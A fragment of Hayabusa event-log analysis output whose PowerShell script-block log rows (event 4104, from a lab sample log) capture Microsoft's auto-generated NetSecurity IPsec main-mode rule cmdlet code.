[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 